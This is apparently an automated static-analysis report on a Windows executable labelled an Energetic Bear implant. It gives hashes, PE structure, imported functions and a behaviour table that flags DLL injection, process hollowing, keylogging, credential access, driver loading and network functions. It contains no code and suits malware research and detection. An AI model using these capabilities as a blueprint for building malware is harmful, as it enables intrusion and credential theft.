DETAILS:PROPERTIES

key value
Name x_energeticbear_x_energetic_bear_implant
md5 f901c645188f9c80afa8f49174f065ce
sha1 272bc9298b394760d68e14dcf479233800a098a9
sha256 9385d7e149bcda79e5a4291ad422c160be8297d029d04ee04c50240fe53aa900
ssdeep 24576:7MWHiFDV07ECXo4tu619SbX7ZwwjeJJV+CBqAKngHu8LNZZ/LJCPlyPlVzOCr:WJ6qbroCn8u8jhL0PMtVSCr
size 1.92MB
bytes 2008064
mime application/x-dosexec
extension None
Entropy 6.432133793497631 (Minimum: 0.0, Maximum: 8.0)

ENCODING:DETAILS

key value
charset binary
ForceEncoding utf-8
ByteOrderMark None

PE:GENERAL

key value
PE Type exe
Entrypoint 6951
Entrypoint Section .text
Header checksum 0x0
Verify checksum 0x1ef9c4
Match checksum False
Sig e968550000e9475e0300e9ca
imphash 6dfd283212216123373d6f57e66e4ef4
warning None
Timestamp 2017-05-11 04:57:16

PE:CHARACTERISTICS

key value
High Entropy True
aslr True
Force Integrity False
dep True
seh True
No Bind False
cfg False
No Isolation False
App Container False
wdm Driver False

PE:SECTIONS

Section Suspicious Size Entropy MD5 Description
.text No 375296 5.763015493521704 (Minimum: 0.0, Maximum: 8.0) 3529ef5fc304717c1961a0eaa46a0a4c code section
.rdata No 107008 4.696237877571576 (Minimum: 0.0, Maximum: 8.0) 99f4121ef2d6b9fa0edd78d09ae1df6f read-only initialized data section (ms and borland)
.data No 4096 1.65037735127028 (Minimum: 0.0, Maximum: 8.0) bb186fa87eaf3e725f1517b91f7b5a4e data section
.pdata No 18432 5.330196495202397 (Minimum: 0.0, Maximum: 8.0) ed9d9e6bd727c13b9e078f5ef2a34d67 exception handling functions section (pdata records)
.idata No 4608 3.796330539997049 (Minimum: 0.0, Maximum: 8.0) 712c3470a5943c3b9020ab5e78254efc initialized data section (borland)
.gfids No 1024 1.8275059276313794 (Minimum: 0.0, Maximum: 8.0) c4ad94585643ab7028a1c5e82c4c0c5f section added by new visual studio (14.0)
.00cfg True, 0.15517757530476972 512 0.15517757530476972 (Minimum: 0.0, Maximum: 8.0) b7c97bfc729e732ea987df623e7bc71b control flow guard
.rsrc True, 6.43192818127444 1488384 6.43192818127444 (Minimum: 0.0, Maximum: 8.0) 95ee475f64465c133088a29f3a86ccb3 resource section
.reloc No 7680 2.1363846100909862 (Minimum: 0.0, Maximum: 8.0) ac4f7eeceb6499d54734aea6597e5676 relocations section

PE:DLLS

Dll Description
KERNEL32.dll windows nt base api client dll
ole32.dll microsoft ole for windows

PE:RESOURCES

Resource Offset MD5 Sig Description
CYB 0xff558 a6c6c4423540e448ea146c58cb985f73 433a5c5c55736572735c5c37
LOL 0x84230 979128b6017961ec9f5b961ede4d8fb3 524946461cb3070041564920
RT_MANIFEST 0x1b2aa0 1e4a89b11eae0fcf8bb5fdd5ec3b6f61 3c3f786d6c2076657273696f side-by-side assembly manifest

PE:IMPORTED FUNCTIONS

Dll Function Description
KERNEL32.dll ExpandEnvironmentStringsW expands environment-variable strings and replaces them with the values defined for the current user.to specify the environment block for a particular user or the system, use the expandenvironmentstringsforuser function.
KERNEL32.dll CreateFileW creates or opens a file or i/o device. the most commonly used i/o devices are as follows: file, filestream, directory, physical disk, volume, console buffer, tape drive, communications resource, mailslot, andpipe. the function returns a handle that can be used to access the file or device for various types ofi/o depending on the file or device and the flags and attributes specified.to perform this operation as a transacted operation, which results in a handle that can be used for transactedi/o, use the createfiletransacted function.
KERNEL32.dll WriteFile writes data to the specified file or input/output (i/o) device.this function is designed for both synchronous and asynchronous operation. for a similar function designedsolely for asynchronous operation, see writefileex.
KERNEL32.dll CloseHandle closes an open object handle.
KERNEL32.dll LoadResource retrieves a handle that can be used to obtain a pointer to the first byte of the specified resource in memory.
KERNEL32.dll LockResource retrieves a pointer to the specified resource in memory.
KERNEL32.dll SizeofResource retrieves the size, in bytes, of the specified resource.
KERNEL32.dll FindResourceA determines the location of a resource with the specified type and name in the specified module.to specify a language, use the findresourceex function.
KERNEL32.dll FlushFileBuffers flushes the buffers of a specified file and causes all buffered data to be written to a file.
KERNEL32.dll SetFilePointerEx moves the file pointer of the specified file.
KERNEL32.dll GetConsoleMode retrieves the current input mode of a console's input buffer or the current output mode of a console screen buffer.
KERNEL32.dll GetConsoleCP retrieves the input code page used by the console associated with the calling process. a console uses its input code page to translate keyboard input into the corresponding character value.
KERNEL32.dll IsDebuggerPresent determines whether the calling process is being debugged by a user-mode debugger.
KERNEL32.dll RaiseException raises an exception in the calling thread.
KERNEL32.dll MultiByteToWideChar maps a character string to a utf-16 (wide character) string. the character string is not necessarily from a multibyte character set.cautionusing the multibytetowidechar function incorrectly can compromise the security of your application. calling this function can easily cause a buffer overrun because the size of the input buffer indicated by lpmultibytestr equals the number of bytes in the string, while the size of the output buffer indicated by lpwidecharstr equals the number of characters. to avoid a buffer overrun, your application must specify a buffer size appropriate for the data type the buffer receives. for more information, see security considerations: international features.notethe ansi code pages can be different on different computers, or can be changed for a single computer, leading to data corruption. for the most consistent results, applications should use unicode, such as utf-8 or utf-16, instead of a specific code page, unless legacy standards or data formats prevent the use of unicode. if using unicode is not possible, applications should tag the data stream with the appropriate encoding name when protocols allow it. html and xml files allow tagging, but text files do not.
KERNEL32.dll WideCharToMultiByte maps a utf-16 (wide character) string to a new character string. the new character string is not necessarily from a multibyte character set.cautionusing the widechartomultibyte function incorrectly can compromise the security of your application. calling this function can easily cause a buffer overrun because the size of the input buffer indicated by lpwidecharstr equals the number of characters in the unicode string, while the size of the output buffer indicated by lpmultibytestr equals the number of bytes. to avoid a buffer overrun, your application must specify a buffer size appropriate for the data type the buffer receives.data converted from utf-16 to non-unicode encodings is subject to data loss, because a code page might not be able to represent every character used in the specific unicode data. for more information, see security considerations: international features.note the ansi code pages can be different on different computers, or can be changed for a single computer, leading to data corruption. for the most consistent results, applications should use unicode, such as utf-8 or utf-16, instead of a specific code page, unless legacy standards or data formats prevent the use of unicode. if using unicode is not possible, applications should tag the data stream with the appropriate encoding name when protocols allow it. html and xml files allow tagging, but text files do not.
KERNEL32.dll RtlCaptureContext the rtlcapturecontext function retrieves a context record in the context of the caller.
KERNEL32.dll RtlLookupFunctionEntry searches the active function tables for an entry that corresponds to the specified pc value.
KERNEL32.dll RtlVirtualUnwind retrieves the invocation context of the function that precedes the specified function context.notethis function is not implemented on all processor platforms and the implementation is different on each platform that supports it. the following prototype lists all the potential parameters and their application. read further for processor-specific function prototypes.
KERNEL32.dll UnhandledExceptionFilter an application-defined function that passes unhandled exceptions to the debugger, if the process is being debugged. otherwise, it optionally displays an application error message box and causes the exception handler to be executed. this function can be called only from within the filter expression of an exception handler.
KERNEL32.dll SetUnhandledExceptionFilter enables an application to supersede the top-level exception handler of each thread of a process.after calling this function, if an exception occurs in a process that is not being debugged, and the exception makes it to the unhandled exception filter, that filter will call the exception filter function specified by the lptoplevelexceptionfilter parameter.
KERNEL32.dll GetCurrentProcess retrieves a pseudo handle for the current process.
KERNEL32.dll TerminateProcess terminates the specified process and all of its threads.
KERNEL32.dll IsProcessorFeaturePresent determines whether the specified processor feature is supported by the current computer.
KERNEL32.dll QueryPerformanceCounter retrieves the current value of the high-resolution performance counter.
KERNEL32.dll GetCurrentProcessId retrieves the process identifier of the calling process.
KERNEL32.dll GetCurrentThreadId retrieves the thread identifier of the calling thread.
KERNEL32.dll GetSystemTimeAsFileTime retrieves the current system date and time. the information is in coordinated universal time (utc) format.
KERNEL32.dll InitializeSListHead initializes the head of a singly linked list.
KERNEL32.dll GetStartupInfoW retrieves the contents of thestartupinfo structure that was specified when the calling process was created.
KERNEL32.dll GetModuleHandleW retrieves a module handle for the specified module. the module must have been loaded by the calling process.to avoid the race conditions described in the remarks section, use thegetmodulehandleex function.
KERNEL32.dll GetLastError retrieves the calling thread's last-error code value. the last-error code is maintained on a per-thread basis. multiple threads do not overwrite each other's last-error code.visual basic:applications should call err.lastdllerror instead ofgetlasterror.
KERNEL32.dll HeapAlloc allocates a block of memory from a heap. the allocated memory is not movable.
KERNEL32.dll HeapFree frees a memory block allocated from a heap by theheapalloc orheaprealloc function.
KERNEL32.dll GetProcessHeap retrieves a handle to the default heap of the calling process. this handle can then be used in subsequent calls to the heap functions.
KERNEL32.dll VirtualQuery retrieves information about a range of pages in the virtual address space of the calling process.to retrieve information about a range of pages in the address space of another process, use thevirtualqueryex function.
KERNEL32.dll FreeLibrary frees the loaded dynamic-link library (dll) module and, if necessary, decrements its reference count. when the reference count reaches zero, the module is unloaded from the address space of the calling process and the handle is no longer valid.
KERNEL32.dll GetProcAddress retrieves the address of an exported function or variable from the specified dynamic-link library (dll).
KERNEL32.dll RtlUnwindEx initiates an unwind of procedure call frames.
KERNEL32.dll InterlockedPushEntrySList inserts an item at the front of a singly linked list. access to the list is synchronized on a multiprocessor system.
KERNEL32.dll InterlockedFlushSList removes all items from a singly linked list. access to the list is synchronized on a multiprocessor system.
KERNEL32.dll GetModuleFileNameW retrieves the fully qualified path for the file that contains the specified module. the module must have been loaded by the current process.to locate the file for a module that was loaded by another process, use thegetmodulefilenameex function.
KERNEL32.dll LoadLibraryExW loads the specified module into the address space of the calling process. the specifiedmodule may cause other modules to be loaded.
KERNEL32.dll SetLastError sets the last-error code for the calling thread.
KERNEL32.dll EnterCriticalSection waits for ownership of the specified critical section object. the function returns when the calling thread is granted ownership.
KERNEL32.dll LeaveCriticalSection releases ownership of the specified critical section object.
KERNEL32.dll DeleteCriticalSection releases all resources used by an unowned critical section object.
KERNEL32.dll InitializeCriticalSectionAndSpinCount initializes a critical section object and sets the spin count for the critical section. when a thread tries to acquire a critical section that is locked, the thread spins: it enters a loop which iterates spin count times, checking to see if the lock is released. if the lock is not released before the loop finishes, the thread goes to sleep to wait for the lock to be released.
KERNEL32.dll TlsAlloc allocates a thread local storage (tls) index. any thread of the process can subsequently use this index to store and retrieve values that are local to the thread, because each thread receives its own slot for the index.
KERNEL32.dll TlsGetValue retrieves the value in the calling thread's thread local storage (tls) slot for the specified tls index. each thread of a process has its own slot for each tls index.
KERNEL32.dll TlsSetValue stores a value in the calling thread's thread local storage (tls) slot for the specified tls index. each thread of a process has its own slot for each tls index.
KERNEL32.dll TlsFree releases a thread local storage (tls) index, making it available for reuse.
KERNEL32.dll GetStdHandle retrieves a handle to the specified standard device (standard input, standard output, or standard error).
KERNEL32.dll GetModuleFileNameA retrieves the fully qualified path for the file that contains the specified module. the module must have been loaded by the current process.to locate the file for a module that was loaded by another process, use thegetmodulefilenameex function.
KERNEL32.dll ExitProcess ends the calling process and all its threads.
KERNEL32.dll GetModuleHandleExW retrieves a module handle for the specified module and increments the module's reference count unless get_module_handle_ex_flag_unchanged_refcount is specified. the module must have been loaded by the calling process.
KERNEL32.dll GetACP retrieves the current windows ansi code page identifier for the operating system.cautionthe ansi api functions, for example, the ansi version of textout, implicitly use getacp to translate text to or from unicode. for the multilingual user interface (mui) edition of windows, the system acp might not cover all code points in the user's selected logon language identifier. for compatibility with this edition, your application should avoid calls that depend on getacp either implicitly or explicitly, as this function can cause some locales to display text as question marks. instead, the application should use the unicode api functions directly, for example, the unicode version of textout.
KERNEL32.dll GetCurrentThread retrieves a pseudo handle for the calling thread.
KERNEL32.dll OutputDebugStringA sends a string to the debugger for display.
KERNEL32.dll OutputDebugStringW sends a string to the debugger for display.
KERNEL32.dll WaitForSingleObjectEx waits until the specified object is in the signaled state, an i/o completion routine or asynchronous procedure call (apc) is queued to the thread, or the time-out interval elapses.to wait for multiple objects, use thewaitformultipleobjectsex.
KERNEL32.dll CreateThread the createthread function is a wrapper for the windowscreatethread function that should be used by the local security authority (lsa). it creates a thread that the lsa can track, attaches debugging information to threads it starts, and provides special exception handling to protect the lsa process.
KERNEL32.dll FindClose closes a file search handle opened by thefindfirstfile,findfirstfileex,findfirstfilenamew,findfirstfilenametransactedw,findfirstfiletransacted,findfirststreamtransactedw, orfindfirststreamw functions.
KERNEL32.dll FindFirstFileExA searches a directory for a file or subdirectory with a name and attributes that match thosespecified.for the most basic version of this function, seefindfirstfile.to perform this operation as a transacted operation, use thefindfirstfiletransacted function.
KERNEL32.dll FindFirstFileExW searches a directory for a file or subdirectory with a name and attributes that match thosespecified.for the most basic version of this function, seefindfirstfile.to perform this operation as a transacted operation, use thefindfirstfiletransacted function.
KERNEL32.dll FindNextFileA continues a file search from a previous call to thefindfirstfile,findfirstfileex, orfindfirstfiletransacted functions.
KERNEL32.dll FindNextFileW continues a file search from a previous call to thefindfirstfile,findfirstfileex, orfindfirstfiletransacted functions.
KERNEL32.dll IsValidCodePage determines if a specified code page is valid.
KERNEL32.dll GetOEMCP returns the current original equipment manufacturer (oem) code page identifier for the operating system.note the ansi code pages can be different on different computers, or can be changed for a single computer, leading to data corruption. for the most consistent results, applications should use unicode, such as utf-8 or utf-16, instead of a specific code page.
KERNEL32.dll GetCPInfo retrieves information about any valid installed or available code page.noteto obtain additional information about valid installed or available code pages, the application should use getcpinfoex.
KERNEL32.dll GetCommandLineA retrieves the command-line string for the current process.
KERNEL32.dll GetCommandLineW retrieves the command-line string for the current process.
KERNEL32.dll GetEnvironmentStringsW retrieves the environment variables for the current process.
KERNEL32.dll FreeEnvironmentStringsW frees a block of environment strings.
KERNEL32.dll SetEnvironmentVariableA sets the contents of the specified environment variable for the current process.
KERNEL32.dll SetEnvironmentVariableW sets the contents of the specified environment variable for the current process.
KERNEL32.dll GetDateFormatW formats a date as a date string for a locale specified by the locale identifier. the function formats either a specified date or the local system date. notefor interoperability reasons, the application should prefer the getdateformatex function to getdateformat because microsoft is migrating toward the use of locale names instead of locale identifiers for new locales. any application that will be run only on windowsvista and later should use getdateformatex.
KERNEL32.dll GetTimeFormatW formats time as a time string for a locale specified by identifier. the function formats either a specified time or the local system time.notefor interoperability reasons, the application should prefer the gettimeformatex function to gettimeformat because microsoft is migrating toward the use of locale names instead of locale identifiers for new locales. any application that will be run only on windowsvista and later should use gettimeformatex.
KERNEL32.dll CompareStringW compares two character strings, for a locale specified by identifier.cautionusing comparestring incorrectly can compromise the security of your application. strings that are not compared correctly can produce invalid input. for example, the function can raise security issues when used for a non-linguistic comparison, because two strings that are distinct in their binary representation can be linguistically equivalent. the application should test strings for validity before using them, and should provide error handlers. for more information, see security considerations: international features.notefor compatibility with unicode, your applications should prefer comparestringex or the unicode version of comparestring. another reason for preferring comparestringex is that microsoft is migrating toward the use of locale names instead of locale identifiers for new locales, for interoperability reasons. any application that will be run only on windowsvista and later should use comparestringex.
KERNEL32.dll LCMapStringW for a locale specified by identifier, maps one input character string to another using a specified transformation, or generates a sort key for the input string. notefor interoperability reasons, the application should prefer the lcmapstringex function to lcmapstring because microsoft is migrating toward the use of locale names instead of locale identifiers for new locales. this recommendation applies especially to custom locales, including those created by microsoft. any application that will be run only on windowsvista and later should use lcmapstringex.
KERNEL32.dll GetLocaleInfoW retrieves information about a locale specified by identifier.notefor interoperability reasons, the application should prefer the getlocaleinfoex function to getlocaleinfo because microsoft is migrating toward the use of locale names instead of locale identifiers for new locales. any application that runs only on windowsvista and later should use getlocaleinfoex.
KERNEL32.dll IsValidLocale determines if the specified locale is installed or supported on the operating system. for more information, see locales and languages.
KERNEL32.dll GetUserDefaultLCID returns the locale identifier for the user default locale.cautionif the user default locale is a custom locale, an application cannot accurately tag data with the value or exchange it. in this case, the application should use getuserdefaultlocalename in preference to getuserdefaultlcid.noteapplications that are intended to run only on windowsvista and later should use getuserdefaultlocalename.
KERNEL32.dll EnumSystemLocalesW enumerates the locales that are either installed on or supported by an operating system.notefor interoperability reasons, the application should prefer the enumsystemlocalesex function to enumsystemlocales because microsoft is migrating toward the use of locale names instead of locale identifiers for new locales. any application that will be run only on windowsvista and later should use enumsystemlocalesex.
KERNEL32.dll SetStdHandle sets the handle for the specified standard device (standard input, standard output, or standard error).
KERNEL32.dll GetFileType retrieves the file type of the specified file.
KERNEL32.dll GetStringTypeW retrieves character type information for the characters in the specified unicode source string. for each character in the string, the function sets one or more bits in the corresponding 16-bit element of the output array. each bit identifies a given character type, for example, letter, digit, or neither. cautionusing the getstringtypew function incorrectly can compromise the security of your application. to avoid a buffer overflow, the application must set the output buffer size correctly. for more security information, see security considerations: windows user interface.
KERNEL32.dll SetConsoleCtrlHandler adds or removes an application-definedhandlerroutine function from the list of handler functions for the calling process.if no handler function is specified, the function sets an inheritable attribute that determines whether the calling process ignores ctrl+c signals.
KERNEL32.dll HeapSize retrieves the size of a memory block allocated from a heap by theheapalloc orheaprealloc function.
KERNEL32.dll HeapReAlloc reallocates a block of memory from a heap. this function enables you to resize a memory block and change other memory block properties. the allocated memory is not movable.
KERNEL32.dll WriteConsoleW writes a character string to a console screen buffer beginning at the current cursor location.
ole32.dll CoCreateInstance creates a single uninitialized object of the class associated with a specified clsid.call cocreateinstance when you want to create only one object on the local system. to create a single object on a remote system, call the cocreateinstanceex function. to create multiple objects based on a single clsid, call the cogetclassobject function.
ole32.dll CoUninitialize closes the com library on the current thread, unloads all dlls loaded by the thread, frees any other resources that the thread maintains, and forces all rpc connections on the thread to close.
ole32.dll CoInitialize initializes the com library on the current thread and identifies the concurrency model as single-thread apartment (sta).new applications should call coinitializeex instead of coinitialize.if you want to use the windows runtime, you must call windows::foundation::initialize instead.

PE:MANIFEST

Manifest
<?xml version='1.0' encoding='UTF-8' standalone='yes'?>
<assembly xmlns='urn:schemas-microsoft-com:asm.v1' manifestVersion='1.0'>
  <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
    <security>
      <requestedPrivileges>
        <requestedExecutionLevel level='asInvoker' uiAccess='false' />
      </requestedPrivileges>
    </security>
  </trustInfo>
</assembly>

BEHAVIOR:INTELL

Matched Required Behavior Detected
4 4 DLL injection openprocess,virtualallocex,writevirtualmemory,createremotethread
5 5 DLL injection openprocess,virtualallocex,writevirtualmemory,openthread,queueuserapc
4 4 DLL injection openprocess,virtualallocex,writevirtualmemory,rtlcreateuserthread
5 5 DLL injection openprocess,virtualallocex,writevirtualmemory,getthreadcontext,setthreadcontext
1 1 Mutex functionality createmutex
2 1 Get folder location gettemppath,shgetfolderpath
2 1 Keyboard functionality getasynckeystate,getkeystate
1 1 Keylogger functionality mapvirtualkey
4 1 Privileges interaction adjusttokenprivileges,lsaenumeratelogonsessions,samigetprivatedata,lookupprivilegevalue
2 1 Dynamic loading loadlibrary,getprocaddress
1 1 Time interaction getsystemtime
1 1 Atom interaction queueuserapc
3 3 Process Hollowing writevirtualmemory,setthreadcontext,resumethread
1 1 Process Hollowing unmapviewofsection
3 1 Registry interaction regopenkey,regqueryvalue,regclosekey
6 1 Service interaction openservice,startservice,createservice,deleteservice,startservicectrldispatcher,controlservice
1 1 Load driver zwloaddriver
1 1 Driver interaction deviceiocontrol
6 1 File IO createfile,writefile,getfilesize,readfile,deletefile,getfiletype
3 1 Creating process createprocess,shellexecute,winexec
1 1 Unpacking functionality decompressbuffer
2 2 Packer functionality virtualalloc,virtualprotect
3 1 Screenshot functionality bitblt,getdc,releasedc
11 1 Networking using socket accept,bind,connect,close,gethostbyname,errno,inet_aton,listen,recv,select,send
7 1 Networking using WinInet internetopen,internetconnect,internetopenurl,httpopenrequest,httpsendrequest,internetreadfile,internetwritefile
4 1 Networking using Winsock2 wsarecv,wsasend,wsastartup,wsacleanup
4 1 Networking using URLMon urlopenpullstream,urldownloadtofile,urldownloadtocachefile,urlopenstream
1 1 Username enumeration getusername
1 1 System enumeration getversion
5 1 Debugger detection isdebuggerpresent,checkremotedebuggerpresent,outputdebugstring,findclose,debugactiveprocess
2 1 COM interaction coinitialize,cocreateinstance
1 1 Credential interaction lsaenumeratelogonsessions
1 1 Volume information getvolumeinformation
2 1 System information getsysteminfo,getsystemmetrics
1 1 Version information getversion
2 1 Token information openprocesstoken,gettokeninformation
4 1 White list getcommandline,getmodulehandle,getstartupinfo,getversion
4 1 SEH information addvectoredexceptionhandler,removevectoredexceptionhandler,xcptfilter,vbaexcepthandler
1 1 Network enumeration netshareenum
1 1 Process enumeration createtoolhelp32snapshot
1 1 Process enumeration createtoolhelp32snapshot

XREFS:TEXT

From To
sub.LOL_12 sym.imp.KERNEL32.dll_ExpandEnvironmentStringsW
sub.LOL_12 sym.imp.KERNEL32.dll_ExpandEnvironmentStringsW
sub.LOL_12 sym.imp.KERNEL32.dll_CreateFileW
sub.LOL_12 sym.imp.KERNEL32.dll_CreateFileW
sub.LOL_12 sym.imp.KERNEL32.dll_WriteFile
sub.KERNEL32.dll_GetStdHandle_210 sym.imp.KERNEL32.dll_WriteFile
sub.KERNEL32.dll_GetConsoleCP_6e0 sym.imp.KERNEL32.dll_WriteFile
sub.KERNEL32.dll_GetConsoleCP_6e0 sym.imp.KERNEL32.dll_WriteFile
sub.KERNEL32.dll_WriteFile_ad8 sym.imp.KERNEL32.dll_WriteFile
sub.KERNEL32.dll_WriteFile_c20 sym.imp.KERNEL32.dll_WriteFile
sub.KERNEL32.dll_WideCharToMultiByte_d84 sym.imp.KERNEL32.dll_WriteFile
sub.LOL_12 sym.imp.KERNEL32.dll_WriteFile
sub.KERNEL32.dll_GetStdHandle_210 sym.imp.KERNEL32.dll_WriteFile
sub.KERNEL32.dll_GetConsoleCP_6e0 sym.imp.KERNEL32.dll_WriteFile
sub.KERNEL32.dll_GetConsoleCP_6e0 sym.imp.KERNEL32.dll_WriteFile
sub.KERNEL32.dll_WriteFile_c20 sym.imp.KERNEL32.dll_WriteFile
sub.KERNEL32.dll_WideCharToMultiByte_d84 sym.imp.KERNEL32.dll_WriteFile
sub.KERNEL32.dll_WriteFile_ad8 sym.imp.KERNEL32.dll_WriteFile
sub.LOL_12 sym.imp.KERNEL32.dll_CloseHandle
sub.LOL_12 sym.imp.KERNEL32.dll_CloseHandle
sub.KERNEL32.dll_IsDebuggerPresent_44a sym.imp.KERNEL32.dll_CloseHandle
sub.LOL_12 sym.imp.KERNEL32.dll_CloseHandle
sub.LOL_12 sym.imp.KERNEL32.dll_CloseHandle
sub.KERNEL32.dll_IsDebuggerPresent_44a sym.imp.KERNEL32.dll_CloseHandle
sub.LOL_12 sym.imp.KERNEL32.dll_LoadResource
sub.LOL_12 sym.imp.KERNEL32.dll_LoadResource
sub.LOL_12 sym.imp.KERNEL32.dll_LockResource
sub.LOL_12 sym.imp.KERNEL32.dll_LockResource
sub.LOL_12 sym.imp.KERNEL32.dll_SizeofResource
sub.LOL_12 sym.imp.KERNEL32.dll_SizeofResource
sub.KERNEL32.dll_GetCPInfo_734 sym.imp.KERNEL32.dll_MultiByteToWideChar
sub.LOL_12 sym.imp.KERNEL32.dll_FindResourceA
sub.LOL_12 sym.imp.KERNEL32.dll_FindResourceA
sub.KERNEL32.dll_SetFilePointerEx_708 sym.imp.KERNEL32.dll_SetFilePointerEx
sub.KERNEL32.dll_SetFilePointerEx_7c8 sym.imp.KERNEL32.dll_SetFilePointerEx
sub.KERNEL32.dll_SetFilePointerEx_7c8 sym.imp.KERNEL32.dll_SetFilePointerEx
sub.KERNEL32.dll_SetFilePointerEx_7c8 sym.imp.KERNEL32.dll_SetFilePointerEx
sub.KERNEL32.dll_SetFilePointerEx_708 sym.imp.KERNEL32.dll_SetFilePointerEx
sub.KERNEL32.dll_SetFilePointerEx_7c8 sym.imp.KERNEL32.dll_SetFilePointerEx
sub.KERNEL32.dll_SetFilePointerEx_7c8 sym.imp.KERNEL32.dll_SetFilePointerEx
sub.KERNEL32.dll_SetFilePointerEx_7c8 sym.imp.KERNEL32.dll_SetFilePointerEx
sub.KERNEL32.dll_GetConsoleCP_6e0 sym.imp.KERNEL32.dll_GetConsoleCP
sub.KERNEL32.dll_GetConsoleCP_6e0 sym.imp.KERNEL32.dll_GetConsoleCP
sub.KERNEL32.dll_RtlCaptureContext_824 sym.imp.KERNEL32.dll_IsDebuggerPresent
sub.KERNEL32.dll_RtlCaptureContext_794 sym.imp.KERNEL32.dll_IsDebuggerPresent
sub.KERNEL32.dll_IsDebuggerPresent_44a sym.imp.KERNEL32.dll_IsDebuggerPresent
sub.KERNEL32.dll_IsDebuggerPresent_44a sym.imp.KERNEL32.dll_IsDebuggerPresent
sub.KERNEL32.dll_MultiByteToWideChar_610 sym.imp.KERNEL32.dll_IsDebuggerPresent
sub.KERNEL32.dll_RtlCaptureContext_824 sym.imp.KERNEL32.dll_IsDebuggerPresent
sub.KERNEL32.dll_MultiByteToWideChar_610 sym.imp.KERNEL32.dll_IsDebuggerPresent
sub.KERNEL32.dll_IsDebuggerPresent_44a sym.imp.KERNEL32.dll_IsDebuggerPresent
sub.KERNEL32.dll_IsDebuggerPresent_44a sym.imp.KERNEL32.dll_IsDebuggerPresent
sub.KERNEL32.dll_RtlCaptureContext_794 sym.imp.KERNEL32.dll_IsDebuggerPresent
sub.KERNEL32.dll_RaiseException_b0 sym.imp.KERNEL32.dll_RaiseException
sub.KERNEL32.dll_RaiseException_100 sym.imp.KERNEL32.dll_RaiseException
sub.KERNEL32.dll_RaiseException_b0 sym.imp.KERNEL32.dll_RaiseException
sub.KERNEL32.dll_RaiseException_100 sym.imp.KERNEL32.dll_RaiseException
sub.KERNEL32.dll_MultiByteToWideChar_610 sym.imp.KERNEL32.dll_MultiByteToWideChar
sub.KERNEL32.dll_MultiByteToWideChar_610 sym.imp.KERNEL32.dll_MultiByteToWideChar
sub.KERNEL32.dll_MultiByteToWideChar_bb8 sym.imp.KERNEL32.dll_MultiByteToWideChar
sub.KERNEL32.dll_MultiByteToWideChar_bb8 sym.imp.KERNEL32.dll_MultiByteToWideChar
sub.KERNEL32.dll_MultiByteToWideChar_f18 sym.imp.KERNEL32.dll_MultiByteToWideChar
sub.KERNEL32.dll_MultiByteToWideChar_f18 sym.imp.KERNEL32.dll_MultiByteToWideChar
sub.KERNEL32.dll_GetCPInfo_734 sym.imp.KERNEL32.dll_MultiByteToWideChar
sub.KERNEL32.dll_GetCPInfo_734 sym.imp.KERNEL32.dll_MultiByteToWideChar
sub.KERNEL32.dll_GetCPInfo_734 sym.imp.KERNEL32.dll_MultiByteToWideChar
sub.KERNEL32.dll_GetCPInfo_734 sym.imp.KERNEL32.dll_MultiByteToWideChar
sub.KERNEL32.dll_MultiByteToWideChar_610 sym.imp.KERNEL32.dll_MultiByteToWideChar
sub.KERNEL32.dll_MultiByteToWideChar_610 sym.imp.KERNEL32.dll_MultiByteToWideChar
sub.KERNEL32.dll_MultiByteToWideChar_bb8 sym.imp.KERNEL32.dll_MultiByteToWideChar
sub.KERNEL32.dll_MultiByteToWideChar_bb8 sym.imp.KERNEL32.dll_MultiByteToWideChar
sub.KERNEL32.dll_MultiByteToWideChar_f18 sym.imp.KERNEL32.dll_MultiByteToWideChar
sub.KERNEL32.dll_MultiByteToWideChar_f18 sym.imp.KERNEL32.dll_MultiByteToWideChar
sub.KERNEL32.dll_GetCPInfo_734 sym.imp.KERNEL32.dll_MultiByteToWideChar
sub.KERNEL32.dll_GetCPInfo_734 sym.imp.KERNEL32.dll_MultiByteToWideChar
sub.KERNEL32.dll_GetCPInfo_734 sym.imp.KERNEL32.dll_MultiByteToWideChar
sub.KERNEL32.dll_GetCPInfo_734 sym.imp.KERNEL32.dll_MultiByteToWideChar
sub.KERNEL32.dll_MultiByteToWideChar_610 sym.imp.KERNEL32.dll_WideCharToMultiByte
sub.KERNEL32.dll_MultiByteToWideChar_610 sym.imp.KERNEL32.dll_WideCharToMultiByte
sub.KERNEL32.dll_WideCharToMultiByte_ab0 sym.imp.KERNEL32.dll_WideCharToMultiByte
sub.KERNEL32.dll_WideCharToMultiByte_ab0 sym.imp.KERNEL32.dll_WideCharToMultiByte
sub.KERNEL32.dll_GetEnvironmentStringsW_12c sym.imp.KERNEL32.dll_WideCharToMultiByte
sub.KERNEL32.dll_GetEnvironmentStringsW_12c sym.imp.KERNEL32.dll_WideCharToMultiByte
sub.KERNEL32.dll_MultiByteToWideChar_f18 sym.imp.KERNEL32.dll_WideCharToMultiByte
sub.KERNEL32.dll_WideCharToMultiByte_ab4 sym.imp.KERNEL32.dll_WideCharToMultiByte
sub.KERNEL32.dll_GetConsoleCP_6e0 sym.imp.KERNEL32.dll_WideCharToMultiByte
sub.KERNEL32.dll_WideCharToMultiByte_d84 sym.imp.KERNEL32.dll_WideCharToMultiByte
sub.KERNEL32.dll_MultiByteToWideChar_610 sym.imp.KERNEL32.dll_WideCharToMultiByte
sub.KERNEL32.dll_MultiByteToWideChar_610 sym.imp.KERNEL32.dll_WideCharToMultiByte
sub.KERNEL32.dll_WideCharToMultiByte_ab0 sym.imp.KERNEL32.dll_WideCharToMultiByte
sub.KERNEL32.dll_WideCharToMultiByte_ab0 sym.imp.KERNEL32.dll_WideCharToMultiByte
sub.KERNEL32.dll_GetEnvironmentStringsW_12c sym.imp.KERNEL32.dll_WideCharToMultiByte
sub.KERNEL32.dll_GetEnvironmentStringsW_12c sym.imp.KERNEL32.dll_WideCharToMultiByte
sub.KERNEL32.dll_MultiByteToWideChar_f18 sym.imp.KERNEL32.dll_WideCharToMultiByte
sub.KERNEL32.dll_WideCharToMultiByte_ab4 sym.imp.KERNEL32.dll_WideCharToMultiByte
sub.KERNEL32.dll_GetConsoleCP_6e0 sym.imp.KERNEL32.dll_WideCharToMultiByte
sub.KERNEL32.dll_WideCharToMultiByte_d84 sym.imp.KERNEL32.dll_WideCharToMultiByte
sub.KERNEL32.dll_RtlCaptureContext_824 sym.imp.KERNEL32.dll_RtlCaptureContext
sub.KERNEL32.dll_RtlCaptureContext_f34 sym.imp.KERNEL32.dll_RtlCaptureContext
sub.KERNEL32.dll_RtlCaptureContext_fbc sym.imp.KERNEL32.dll_RtlCaptureContext
sub.KERNEL32.dll_RtlCaptureContext_794 sym.imp.KERNEL32.dll_RtlCaptureContext
